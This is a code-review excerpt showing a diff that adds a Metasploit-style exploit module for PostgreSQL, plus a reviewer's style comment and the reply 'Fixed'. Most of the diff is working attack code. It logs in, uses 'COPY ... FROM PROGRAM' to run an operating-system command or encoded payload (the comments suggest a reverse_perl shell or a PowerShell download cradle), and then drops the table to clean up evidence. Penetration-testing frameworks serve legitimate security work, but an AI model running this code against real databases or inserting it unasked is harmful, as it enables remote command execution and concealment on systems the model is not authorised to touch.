modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb

```diff
@@ -0,0 +1,250 @@
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} created successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Copy Command into Table
+    if command != '' # Use command if its not empty, example powershell web_delivery download cradle. Needed for windows because NETWORK SERVICE doesnt have write to disk privs, need to execute in memory
+      cmd_filtered = command.gsub("'", "''")
+    else #Otherwise use the set payload, linux suggested is to use cmd/unix/reverse_perl
+      cmd_filtered = payload.encoded.gsub("'", "''")
+    end
+    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
+    copy_query = postgres_query(query)
+    case copy_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Select output from table for debugging
+    #query = "SELECT * FROM #{tablename};"
+    #select_query = postgres_query(query)
+    #case select_query.keys[0]
+    #when :conn_error
+    #  print_error "#{peer} - Connection error"
+    #  return false
+    #when :sql_error
+    #  print_warning "#{peer} - Unable to execute query: #{query}"
+    #  return false
+    #when :complete
+    #  print_good "#{peer} - #{tablename} contents:\n#{select_query}"
+    #  return true
+    #else
+    #  print_error "#{peer} - Unknown"
+    #  return false
+    #end
+
+    # Clean up table evidence
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+  end
+
+  def do_login(user, pass, database)
+    begin
+      password = pass || postgres_password
+      result = postgres_fingerprint(
+        db: database,
+        username: user,
+        password: password
+      )
+
+      return result[:auth] if result[:auth]
+      print_error "#{peer} - Login failed"
+      return :noauth
+
+    rescue Rex::ConnectionError
+      return :noconn
+    end
+  end
+
+  def exploit
+    print_status("Exploiting...")
+    #vuln_version doesn't seem to work
+    #return unless vuln_version?
+    return unless login_success?
+    successful_exploit = execute_payload
```

Comment:
This variable declaration is unnecessary. Also, the conditional logic usually has the positive branch first.

Consider:

```ruby
    if execute_payload
      print_status("Exploit Succeeded")
    else
      print_status("Exploit Failed")
    end
```

Reply:
Fixed